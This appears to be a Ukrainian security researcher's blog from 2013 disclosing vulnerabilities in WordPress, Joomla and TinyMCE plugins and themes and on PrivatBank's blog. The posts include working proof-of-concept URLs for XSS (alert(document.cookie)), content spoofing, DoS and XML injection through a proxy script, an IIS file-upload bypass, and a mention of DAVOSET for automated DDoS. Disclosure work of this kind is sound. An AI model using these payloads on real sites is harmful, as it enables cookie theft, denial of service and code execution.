Websecurity - Веб безпека

У червні, 28.06.2013, я знайшов Denial of Service, Content Spoofing, Privilege Escalation, Server-Side Request Forgery, Cross-Site Scripting, Full path disclosure та XML External Entities уразливості на сайті http://www.blog.privatbank.ua (блог ПриватБанка). Про що минулого місяця сповістив адміністрацію сайта.

В 2008 році я вже писав про уразливості на www.blog.privatbank.ua, а це нові дірки на цьому сайті. В останнє стосовно ПриватБанка я писав про уразливість в Приват24 для Android.

Ці всі уразливості відносяться до WordPress. Вразлива версія якого використовується на www.blog.privatbank.ua. Раніше я вже писав про численні уразливості в WordPress 3.5.1, що були виправлені у версії 3.5.2. І серед них я детально описав Content Spoofing, Denial of Service, Full path disclosure, Cross-Site Scripting та XML External Entities уразливості. А також навів дві Denial of Service уразливості, що стосуються і WP 3.5.2.

Дані уразливості досі не виправлені, тому що ПриватБанк відмовився це робити (бо цей сайт для них не актуальний). На що я порадив їм закрити сайт і вони пообіцяли подумати над цим.

22.05.2013

У квітні, 14.04.2013, я знайшов Arbitrary File Uploading та Cross-Site Scripting уразливості в TinyMCE Image Manager плагіні для TinyMCE. Про що найближчим часом повідомлю розробникам веб додатку.

Раніше я вже писав про уразливості в TinyMCE Image Manager.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

18.07.2013

Arbitrary File Uploading (WASC-31):

Можлива атака через “1.asp” в імені папки. Це обхідний метод для виконання довільного коду на веб сервері IIS.

TinyMCE Image Manager AFU.html

Cross-Site Scripting (WASC-08):

Це persistent XSS на Linux/Unix та reflected XSS на Windows. Код спрацює одразу після відправки запиту на створення папки і в подальшому при запитах до коннектора (при будь-яких операціях, за виключенням створення папки з існуючим іменем).

TinyMCE Image Manager XSS.html

Уразливі TinyMCE Image Manager 1.1 та попередні версії.

В даній добірці уразливості в веб додатках:

• SAP Enterprise Portal Cross-Site-Scripting (деталі)
• SAP J2EE Core Service Arbitrary File Access (деталі)
• Multiple Vulnerabilities in Saurus CMS 4.7.1 (деталі)
• Multiple Vulnerabilities in Telaen <= 1.3.0 (деталі)
• Local File Inclusion in Weathermap <= 0.97C (деталі)

У липні, 15.07.2013, я знайшов Denial of Service, XML Injection, Cross-Site Scripting та Full path disclosure уразливості в Googlemaps плагіні для Joomla. Про що найближчим часом повідомлю розробникам веб додатку.

Denial of Service (WASC-10):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file

Окрім проведення DoS атак вручну, також можна проводити автоматизовані DoS і DDoS атаки з використанням DAVOSET.

XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml

Можна включати зовнішні xml-файли. Що також може бути використано для XSS атаки:

XSS via XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml

Cross-Site Scripting (WASC-08):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/plugins/content/plugin_googlemap2_proxy.php

Окрім plugin_googlemap2_proxy.php, також трапляється plugin_googlemap3_proxy.php (але він має інший шлях на сайтах).

Уразливі Googlemaps plugin for Joomla версії 2.x, 3.x та потенційно попередні версії. В новій версії DAVOSET я додам чимало сайтів з цим Googlemaps плагіном.

18.05.2013

У квітні, 14.04.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості в TinyMCE Image Manager плагіні для TinyMCE. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

12.07.2013

Cross-Site Scripting (WASC-08):

http://site/path/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/path/images/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Content Spoofing (WASC-12):

http://site/path/images/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
http://site/path/images/js/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif

Уразливі TinyMCE Image Manager 1.1 та попередні версії.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP Private Messages, Xorbin Analog Flash Clock та Xorbin Digital Flash Clock. Для котрих з’явилися експлоіти. WP Private Messages - це плагін для відправлення приватних повідомлень, Xorbin Analog Flash Clock - це аналоговий годинник на флеші, Xorbin Digital Flash Clock - це цифровий годинник на флеші.

• WordPress WP-Private-Messages SQL Injection (деталі)
• Xorbin Analog Flash Clock 1.0 For WordPress XSS (деталі)
• Xorbin Digital Flash Clock 1.0 For WordPress XSS (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• SAP Portal PDC Information Disclosure (деталі)
• SAP SDM Denial of Service (деталі)
• Certain HP LaserJet Pro Printers, Unauthorized Access to Data (деталі)
• Stored Cross-site Scripting (’XSS’) in Airvana HubBub C1-600-RT Femtocell (деталі)
• Denial of Service vulnerability in War FTP Daemon 1.82 (деталі)

У травні, 16.05.2013, я виявив Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі I Love It для WordPress. Про що найближчим часом повідомлю розробникам.

Дана тема містить вразливі версії Audio Player та GDD FLVPlayer. Раніше я писав про XSS та FPD уразливості в темі I Love It New для WordPress - новій версії цього шаблона.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/iloveit/lib/php/assets/player.swf?playerID=%22))}catch(e){alert(document.cookie)}//

Content Spoofing (WASC-12):

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf

В GDD FLVPlayer є 10 уразливостей: 8 CS і 2 XSS.

Full path disclosure (WASC-13):

http://site/wp-content/themes/iloveit/

FPD в index.php та інших php-файлах (в папці та підпапках).

Вразливі всі версії теми I Love It для WordPress.

В даній добірці уразливості в веб додатках:

• HP ArcSight Connector Appliance and ArcSight Logger, Remote Disclosure of Information, Command Injection, Cross-Site Scripting (XSS) (деталі)
• openconnect security update (деталі)
• SAP Netweaver Message Server Multiple Vulnerabilities (деталі)
• Multiple Vulnerabilities in Netgear DGN2200B (деталі)
• Unauthenticated remote access to D-Link DIR-645 devices (деталі)

В останніх версіях WordPress було виправлено чимало уразливостей. Але є такі виправлені уразливості, про які розробники WP навмисно не повідомили (для применшення офіційної кількості виправлених дірок). Про такі випадки я писав неодноразово, вони полюбляють це робити, і зараз наведу нові приклади.

Раніше я вже писав про FPD уразливість в WordPress.

З WordPress постачається плагін Akismet - він входить в ядро WP. В ньому періодично виправляють уразливості, але якщо в readme.txt плагіна розробники згадують про це, то в анонсах виправлень движка вони не згадують ні про ці дірки, ні про оновлення версії Akismet (з виправленими уразливостями), що постачається з новою версію движка. А в WP 3.5.1 та 3.5.2 були оновлені версії Akismet.

У версії WordPress 3.5.1 оновили Akismet з 2.5.6 до 2.5.7. В цій версії плагіна є виправлені уразливості, що додає виправлених дір в релізі 3.5.1. Зокрема виправили декілька Full path disclosure уразливостей та додали .htaccess для блокування прямого доступу до файлів плагіна (що актуально лише для Apache).

У версії WordPress 3.5.2 оновили Akismet з 2.5.7 до 2.5.8. В цій версії плагіна є секюріті покращення (які саме не уточнюється), що додає виправлених дір в релізі 3.5.2.